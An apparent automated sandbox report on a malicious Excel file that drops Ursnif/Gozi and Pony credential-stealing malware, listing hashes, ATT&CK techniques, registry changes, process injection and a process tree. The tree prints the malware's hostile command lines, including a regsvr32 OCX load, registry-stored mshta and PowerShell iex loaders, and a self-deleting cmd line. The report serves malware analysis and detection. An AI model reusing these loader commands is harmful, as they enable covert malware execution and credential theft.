pony | c18e2c68d372caf4cfd5ead1dcfe93d369a93fdc9198c76152283c4e747ecad5

General

Target

tr_9.xls
Size

90KB
MD5

9cf44f1dd44ea313a0d931130ebb1aaf
SHA1

0243be928d28f5b75d4d58af445b6d1b0350ee2c
SHA256

c18e2c68d372caf4cfd5ead1dcfe93d369a93fdc9198c76152283c4e747ecad5
SHA512

e7644dfae5808829f6d5ee129ff2e250da1dd257a3657becec472a562404aa12b6e7ab7b6eba5d93e4a39b02e89afa0b16a08e89adb150e271548bcd3cc9516f

Score

10^/10

rat spyware stealer pony banker trojan gozi_ifsb ursnif discovery

Malware Config

Signatures

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

regsvr32.exe

description	pid	pid_target	process	target process
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process	2064	4060	regsvr32.exe	EXCEL.EXE

Suspicious use of FindShellTrayWindow 3 IoCs

Processes:

iexplore.exe

pid process

1936 iexplore.exe
1936 iexplore.exe
1936 iexplore.exe
Ursnif, Dreambot
Ursnif is a variant of the Gozi IFSB with more capabilities.
banker trojan ursnif
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
spyware

Data from Local System
T1005

Credentials in Files
T1081
Pony,Fareit
Pony is a Remote Access Trojan application that steals information.
rat spyware stealer pony

pid	process
1936	iexplore.exe
1936	iexplore.exe
1936	iexplore.exe

Checks whether UAC is enabled 3 IoCs

Processes:

IEXPLORE.EXEiexplore.exeIEXPLORE.EXE

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	IEXPLORE.EXE
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	iexplore.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	IEXPLORE.EXE

Suspicious use of SetWindowsHookEx 24 IoCs

Processes:

EXCEL.EXEiexplore.exeIEXPLORE.EXEIEXPLORE.EXE

pid	process
4060	EXCEL.EXE
4060	EXCEL.EXE
4060	EXCEL.EXE
4060	EXCEL.EXE
4060	EXCEL.EXE
4060	EXCEL.EXE
4060	EXCEL.EXE
4060	EXCEL.EXE
4060	EXCEL.EXE
4060	EXCEL.EXE
4060	EXCEL.EXE
4060	EXCEL.EXE
1936	iexplore.exe
1936	iexplore.exe
420	IEXPLORE.EXE
420	IEXPLORE.EXE
1936	iexplore.exe
1936	iexplore.exe
3772	IEXPLORE.EXE
3772	IEXPLORE.EXE
1936	iexplore.exe
1936	iexplore.exe
420	IEXPLORE.EXE
420	IEXPLORE.EXE

Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

EXCEL.EXE

pid process

4060 EXCEL.EXE
Loads dropped DLL 1 IoCs

Processes:

regsvr32.exe

pid process

2204 regsvr32.exe

pid	process
2204	regsvr32.exe

Suspicious use of SetThreadContext 7 IoCs

Processes:

regsvr32.exesvchost.exepowershell.exeExplorer.EXEcmd.exe

description	pid	process	target process
PID 2204 set thread context of 1192	2204	regsvr32.exe	svchost.exe
PID 1192 set thread context of 1944	1192	svchost.exe	svchost.exe
PID 2044 set thread context of 3008	2044	powershell.exe	Explorer.EXE
PID 3008 set thread context of 3372	3008	Explorer.EXE	RuntimeBroker.exe
PID 3008 set thread context of 1936	3008	Explorer.EXE	iexplore.exe
PID 3008 set thread context of 3504	3008	Explorer.EXE	cmd.exe
PID 3504 set thread context of 1840	3504	cmd.exe	PING.EXE

Program crash 1 IoCs

Processes:

WerFault.exe

pid pid_target process target process

2884 2204 WerFault.exe regsvr32.exe
Suspicious behavior: MapViewOfSection 5 IoCs

Processes:

powershell.exeExplorer.EXEcmd.exe

pid process

2044 powershell.exe
3008 Explorer.EXE
3008 Explorer.EXE
3008 Explorer.EXE
3504 cmd.exe

pid	pid_target	process	target process
2884	2204	WerFault.exe	regsvr32.exe

pid	process
2044	powershell.exe
3008	Explorer.EXE
3008	Explorer.EXE
3008	Explorer.EXE
3504	cmd.exe

Modifies Internet Explorer settings 1 TTPs 38 IoCs

adware spyware

Modify Registry

T1112

Processes:

iexplore.exeIEXPLORE.EXEIEXPLORE.EXE

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\MINIE\TabBandWidth = "500"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = a09b41629e59d601	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\VersionManager\LastTTLLowDateTime = "1251635200"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\VersionManager\LastUpdateLowDateTime = "1890655137"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	IEXPLORE.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\VersionManager\LastUpdateHighDateTime = "30824862"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\MINIE	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000000000001000000ffffffffffffffffffffffffffffffff5800000000000000de04000065020000	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "30824862"	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "1890655137"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "30824862"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{9C073119-C591-11EA-95F0-DE1063318775} = "0"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\VersionManager\LastUpdateLowDateTime = "1889092564"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "1889092564"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\VersionManager\LastUpdateHighDateTime = "30824862"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\VersionManager\LastTTLHighDateTime = "50"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\VersionManager	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 103647619e59d601	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000000000001000000ffffffffffffffffffffffffffffffff3e0000003e000000c4040000a3020000	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000f72535b3d71787499ad6028e231c2f4e00000000020000000000106600000001000020000000ec8334d87e5f0e769ccd16122762b7c75f2232b3c1dace807516486758584d3e000000000e8000000002000020000000ba774cee27465aeac967f622048fd446e2a65d8b36bcdaea869aa976364bebab200000005a191ac7e926f19ceeafd5f247b8cf6a04f89e5c5f0180207cc361a52cb6885e400000006eda6157a302db1f72661959279973442ebe1f316daa01d9b55604550a1dd8eeb1dfa686f989071a924ef46fb4c4ca866d08e85ad9dcab1a6cb98af607bd1e8e	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000f72535b3d71787499ad6028e231c2f4e00000000020000000000106600000001000020000000094f9cbcfeb61e42ab1f00a8960c336029a855f376ae8525b0f3f9fa7257a321000000000e8000000002000020000000c49ca094bc73d7086d645b0837ee8f37aa1d2bd9d7bf4bb10acdc0857e7d46d020000000e0c88aedec3e5e701abee5cc2af0e3fb46021c2f92b3b910f5fc81f35876812540000000266e32cfc814875cb90a56d8f0625f83818d1ad181739128c5b21ca22602e357c6dcd5ee1f27343645dbc7205c126511f94e619af9a15e6b3935c5cb893aac10	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\VersionManager	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

EXCEL.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	EXCEL.EXE

Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

22 api.ipify.org

flow	ioc
22	api.ipify.org

Suspicious use of WriteProcessMemory 71 IoCs

Processes:

EXCEL.EXEregsvr32.exeregsvr32.exesvchost.exeiexplore.exemshta.exepowershell.execsc.execsc.exeExplorer.EXEcmd.execmd.exe

description	pid	process	target process
PID 4060 wrote to memory of 2064	4060	EXCEL.EXE	regsvr32.exe
PID 4060 wrote to memory of 2064	4060	EXCEL.EXE	regsvr32.exe
PID 2064 wrote to memory of 2204	2064	regsvr32.exe	regsvr32.exe
PID 2064 wrote to memory of 2204	2064	regsvr32.exe	regsvr32.exe
PID 2064 wrote to memory of 2204	2064	regsvr32.exe	regsvr32.exe
PID 2204 wrote to memory of 1192	2204	regsvr32.exe	svchost.exe
PID 2204 wrote to memory of 1192	2204	regsvr32.exe	svchost.exe
PID 2204 wrote to memory of 1192	2204	regsvr32.exe	svchost.exe
PID 2204 wrote to memory of 1192	2204	regsvr32.exe	svchost.exe
PID 2204 wrote to memory of 1192	2204	regsvr32.exe	svchost.exe
PID 1192 wrote to memory of 1608	1192	svchost.exe	cmd.exe
PID 1192 wrote to memory of 1608	1192	svchost.exe	cmd.exe
PID 1192 wrote to memory of 1608	1192	svchost.exe	cmd.exe
PID 1192 wrote to memory of 1944	1192	svchost.exe	svchost.exe
PID 1192 wrote to memory of 1944	1192	svchost.exe	svchost.exe
PID 1192 wrote to memory of 1944	1192	svchost.exe	svchost.exe
PID 1192 wrote to memory of 1944	1192	svchost.exe	svchost.exe
PID 1192 wrote to memory of 1944	1192	svchost.exe	svchost.exe
PID 1192 wrote to memory of 2108	1192	svchost.exe	BN35C0.tmp
PID 1192 wrote to memory of 2108	1192	svchost.exe	BN35C0.tmp
PID 1192 wrote to memory of 2108	1192	svchost.exe	BN35C0.tmp
PID 1936 wrote to memory of 420	1936	iexplore.exe	IEXPLORE.EXE
PID 1936 wrote to memory of 420	1936	iexplore.exe	IEXPLORE.EXE
PID 1936 wrote to memory of 420	1936	iexplore.exe	IEXPLORE.EXE
PID 1936 wrote to memory of 3772	1936	iexplore.exe	IEXPLORE.EXE
PID 1936 wrote to memory of 3772	1936	iexplore.exe	IEXPLORE.EXE
PID 1936 wrote to memory of 3772	1936	iexplore.exe	IEXPLORE.EXE
PID 3000 wrote to memory of 2044	3000	mshta.exe	powershell.exe
PID 3000 wrote to memory of 2044	3000	mshta.exe	powershell.exe
PID 2044 wrote to memory of 2052	2044	powershell.exe	csc.exe
PID 2044 wrote to memory of 2052	2044	powershell.exe	csc.exe
PID 2052 wrote to memory of 4016	2052	csc.exe	cvtres.exe
PID 2052 wrote to memory of 4016	2052	csc.exe	cvtres.exe
PID 2044 wrote to memory of 3192	2044	powershell.exe	csc.exe
PID 2044 wrote to memory of 3192	2044	powershell.exe	csc.exe
PID 3192 wrote to memory of 3768	3192	csc.exe	cvtres.exe
PID 3192 wrote to memory of 3768	3192	csc.exe	cvtres.exe
PID 2044 wrote to memory of 3008	2044	powershell.exe	Explorer.EXE
PID 2044 wrote to memory of 3008	2044	powershell.exe	Explorer.EXE
PID 2044 wrote to memory of 3008	2044	powershell.exe	Explorer.EXE
PID 2044 wrote to memory of 3008	2044	powershell.exe	Explorer.EXE
PID 3008 wrote to memory of 3372	3008	Explorer.EXE	RuntimeBroker.exe
PID 3008 wrote to memory of 3372	3008	Explorer.EXE	RuntimeBroker.exe
PID 3008 wrote to memory of 3504	3008	Explorer.EXE	cmd.exe
PID 3008 wrote to memory of 3504	3008	Explorer.EXE	cmd.exe
PID 3008 wrote to memory of 3504	3008	Explorer.EXE	cmd.exe
PID 3008 wrote to memory of 3372	3008	Explorer.EXE	RuntimeBroker.exe
PID 3008 wrote to memory of 3372	3008	Explorer.EXE	RuntimeBroker.exe
PID 3008 wrote to memory of 1936	3008	Explorer.EXE	iexplore.exe
PID 3008 wrote to memory of 1936	3008	Explorer.EXE	iexplore.exe
PID 3008 wrote to memory of 1936	3008	Explorer.EXE	iexplore.exe
PID 3008 wrote to memory of 3504	3008	Explorer.EXE	cmd.exe
PID 3008 wrote to memory of 3504	3008	Explorer.EXE	cmd.exe
PID 3008 wrote to memory of 1936	3008	Explorer.EXE	iexplore.exe
PID 3504 wrote to memory of 1840	3504	cmd.exe	PING.EXE
PID 3504 wrote to memory of 1840	3504	cmd.exe	PING.EXE
PID 3504 wrote to memory of 1840	3504	cmd.exe	PING.EXE
PID 3504 wrote to memory of 1840	3504	cmd.exe	PING.EXE
PID 3504 wrote to memory of 1840	3504	cmd.exe	PING.EXE
PID 3008 wrote to memory of 3536	3008	Explorer.EXE	cmd.exe
PID 3008 wrote to memory of 3536	3008	Explorer.EXE	cmd.exe
PID 3008 wrote to memory of 3780	3008	Explorer.EXE	cmd.exe
PID 3008 wrote to memory of 3780	3008	Explorer.EXE	cmd.exe
PID 3536 wrote to memory of 1900	3536	cmd.exe	nslookup.exe

Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs

Processes:

PING.EXE

pid process

1840 PING.EXE
Gozi, Gozi IFSB
Gozi ISFB is a well-known and widely distributed banking trojan.
banker trojan gozi_ifsb

pid	process
1840	PING.EXE

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

EXCEL.EXE

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	EXCEL.EXE

Suspicious behavior: EnumeratesProcesses 1958 IoCs

Processes:

svchost.exeWerFault.exepowershell.exeExplorer.EXE

pid	process
1192	svchost.exe
1192	svchost.exe
1192	svchost.exe
1192	svchost.exe
2884	WerFault.exe
2884	WerFault.exe
2884	WerFault.exe
2884	WerFault.exe
2884	WerFault.exe
2884	WerFault.exe
2884	WerFault.exe
2884	WerFault.exe
2884	WerFault.exe
2884	WerFault.exe
2884	WerFault.exe
2884	WerFault.exe
2884	WerFault.exe
2884	WerFault.exe
2884	WerFault.exe
2044	powershell.exe
2044	powershell.exe
2044	powershell.exe
3008	Explorer.EXE
3008	Explorer.EXE
3008	Explorer.EXE
3008	Explorer.EXE
3008	Explorer.EXE
3008	Explorer.EXE
3008	Explorer.EXE
3008	Explorer.EXE
3008	Explorer.EXE
3008	Explorer.EXE
3008	Explorer.EXE
3008	Explorer.EXE
3008	Explorer.EXE
3008	Explorer.EXE
3008	Explorer.EXE
3008	Explorer.EXE
3008	Explorer.EXE
3008	Explorer.EXE
3008	Explorer.EXE
3008	Explorer.EXE
3008	Explorer.EXE
3008	Explorer.EXE
3008	Explorer.EXE
3008	Explorer.EXE
3008	Explorer.EXE
3008	Explorer.EXE
3008	Explorer.EXE
3008	Explorer.EXE
3008	Explorer.EXE
3008	Explorer.EXE
3008	Explorer.EXE
3008	Explorer.EXE
3008	Explorer.EXE
3008	Explorer.EXE
3008	Explorer.EXE
3008	Explorer.EXE
3008	Explorer.EXE
3008	Explorer.EXE
3008	Explorer.EXE
3008	Explorer.EXE
3008	Explorer.EXE
3008	Explorer.EXE

Suspicious use of AdjustPrivilegeToken 96 IoCs

Processes:

svchost.exesvchost.exe

description	pid	process
Token: SeImpersonatePrivilege	1192	svchost.exe
Token: SeTcbPrivilege	1192	svchost.exe
Token: SeChangeNotifyPrivilege	1192	svchost.exe
Token: SeCreateTokenPrivilege	1192	svchost.exe
Token: SeBackupPrivilege	1192	svchost.exe
Token: SeRestorePrivilege	1192	svchost.exe
Token: SeIncreaseQuotaPrivilege	1192	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	1192	svchost.exe
Token: SeImpersonatePrivilege	1192	svchost.exe
Token: SeTcbPrivilege	1192	svchost.exe
Token: SeChangeNotifyPrivilege	1192	svchost.exe
Token: SeCreateTokenPrivilege	1192	svchost.exe
Token: SeBackupPrivilege	1192	svchost.exe
Token: SeRestorePrivilege	1192	svchost.exe
Token: SeIncreaseQuotaPrivilege	1192	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	1192	svchost.exe
Token: SeImpersonatePrivilege	1192	svchost.exe
Token: SeTcbPrivilege	1192	svchost.exe
Token: SeChangeNotifyPrivilege	1192	svchost.exe
Token: SeCreateTokenPrivilege	1192	svchost.exe
Token: SeBackupPrivilege	1192	svchost.exe
Token: SeRestorePrivilege	1192	svchost.exe
Token: SeIncreaseQuotaPrivilege	1192	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	1192	svchost.exe
Token: SeImpersonatePrivilege	1192	svchost.exe
Token: SeTcbPrivilege	1192	svchost.exe
Token: SeChangeNotifyPrivilege	1192	svchost.exe
Token: SeCreateTokenPrivilege	1192	svchost.exe
Token: SeBackupPrivilege	1192	svchost.exe
Token: SeRestorePrivilege	1192	svchost.exe
Token: SeIncreaseQuotaPrivilege	1192	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	1192	svchost.exe
Token: SeImpersonatePrivilege	1192	svchost.exe
Token: SeTcbPrivilege	1192	svchost.exe
Token: SeChangeNotifyPrivilege	1192	svchost.exe
Token: SeCreateTokenPrivilege	1192	svchost.exe
Token: SeBackupPrivilege	1192	svchost.exe
Token: SeRestorePrivilege	1192	svchost.exe
Token: SeIncreaseQuotaPrivilege	1192	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	1192	svchost.exe
Token: SeImpersonatePrivilege	1944	svchost.exe
Token: SeTcbPrivilege	1944	svchost.exe
Token: SeChangeNotifyPrivilege	1944	svchost.exe
Token: SeCreateTokenPrivilege	1944	svchost.exe
Token: SeBackupPrivilege	1944	svchost.exe
Token: SeRestorePrivilege	1944	svchost.exe
Token: SeIncreaseQuotaPrivilege	1944	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	1944	svchost.exe
Token: SeImpersonatePrivilege	1944	svchost.exe
Token: SeTcbPrivilege	1944	svchost.exe
Token: SeChangeNotifyPrivilege	1944	svchost.exe
Token: SeCreateTokenPrivilege	1944	svchost.exe
Token: SeBackupPrivilege	1944	svchost.exe
Token: SeRestorePrivilege	1944	svchost.exe
Token: SeIncreaseQuotaPrivilege	1944	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	1944	svchost.exe
Token: SeImpersonatePrivilege	1944	svchost.exe
Token: SeTcbPrivilege	1944	svchost.exe
Token: SeChangeNotifyPrivilege	1944	svchost.exe
Token: SeCreateTokenPrivilege	1944	svchost.exe
Token: SeBackupPrivilege	1944	svchost.exe
Token: SeRestorePrivilege	1944	svchost.exe
Token: SeIncreaseQuotaPrivilege	1944	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	1944	svchost.exe

Executes dropped EXE 1 IoCs

Processes:

BN35C0.tmp

pid process

2108 BN35C0.tmp
Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

1840 PING.EXE

pid	process
2108	BN35C0.tmp

pid	process
1840	PING.EXE

Checks for installed software on the system 1 TTPs 7 IoCs

discovery

Query Registry

T1012

Processes:

svchost.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall	svchost.exe
Key enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall	svchost.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome\DisplayName	svchost.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\DisplayName	svchost.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\DisplayName	svchost.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}\DisplayName	svchost.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\DisplayName	svchost.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware

Data from Local System
T1005

Credentials in Files
T1081

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
- Suspicious behavior: EnumeratesProcesses
PID:3008

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\tr_9.xls"
2⤵
- Suspicious use of SetWindowsHookEx
- Suspicious behavior: AddClipboardFormatListener
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
- Checks processor information in registry
PID:4060

C:\Windows\System32\regsvr32.exe
"C:\Windows\System32\regsvr32.exe" /s /i dDdoiBj.ocx
3⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:2064

C:\Windows\SysWOW64\regsvr32.exe
/s /i dDdoiBj.ocx
4⤵
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:2204

C:\Windows\SysWOW64\svchost.exe
C:\Windows\System32\svchost.exe
5⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Checks for installed software on the system
PID:1192

C:\Windows\SysWOW64\cmd.exe
cmd /K
6⤵
PID:1608

C:\Windows\SysWOW64\svchost.exe
C:\Windows\System32\svchost.exe
6⤵
- Suspicious use of AdjustPrivilegeToken
PID:1944

C:\Users\Admin\AppData\Local\Temp\BN35C0.tmp
C:\Users\Admin\AppData\Local\Temp\BN35C0.tmp
6⤵
- Executes dropped EXE
PID:2108

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2204 -s 668
5⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
PID:2884

C:\Windows\System32\mshta.exe
"C:\Windows\System32\mshta.exe" "about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\2FFAFA40-C261-3936-44D3-167DB8B7AA01\\\Addrient'));if(!window.flag)close()</script>"
2⤵
- Suspicious use of WriteProcessMemory
PID:3000

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex ([System.Text.Encoding]::ASCII.GetString(( gp "HKCU:Software\AppDataLow\Software\Microsoft\2FFAFA40-C261-3936-44D3-167DB8B7AA01").appiness))
3⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
- Suspicious behavior: EnumeratesProcesses
PID:2044

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\cfsntbwc\cfsntbwc.cmdline"
4⤵
- Suspicious use of WriteProcessMemory
PID:2052

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES971A.tmp" "c:\Users\Admin\AppData\Local\Temp\cfsntbwc\CSCF1148159F8FE457CB2B022E98816BEF7.TMP"
5⤵
PID:4016

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\xpm5cy5i\xpm5cy5i.cmdline"
4⤵
- Suspicious use of WriteProcessMemory
PID:3192

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES97E5.tmp" "c:\Users\Admin\AppData\Local\Temp\xpm5cy5i\CSCF6EAB5B4A5044976A1B55CBDFE26C71B.TMP"
5⤵
PID:3768

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\Admin\AppData\Local\Temp\BN35C0.tmp"
2⤵
- Suspicious use of SetThreadContext
